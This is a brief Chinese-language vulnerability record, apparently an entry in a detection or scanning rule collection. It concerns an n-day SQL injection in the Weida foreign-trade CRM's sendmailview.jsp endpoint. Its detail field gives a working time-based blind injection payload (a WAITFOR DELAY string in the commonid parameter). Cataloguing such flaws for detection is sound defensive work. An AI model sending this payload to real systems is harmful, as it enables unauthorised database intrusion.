vendor = "维达"
name = "维达外贸客户关系管理系统 sendmailview.jsp SQL注入"
type = "SQL注入"
version = "未知"
path = "/wap/common/sendmailview.jsp"
detail = "/wap/common/sendmailview.jsp?commonid=1';WAITFOR+DELAY+'0:0:4'--"
fix = "缺省规则可检出"
date = "0723"
label = "nday"
verifier = "AdySec"
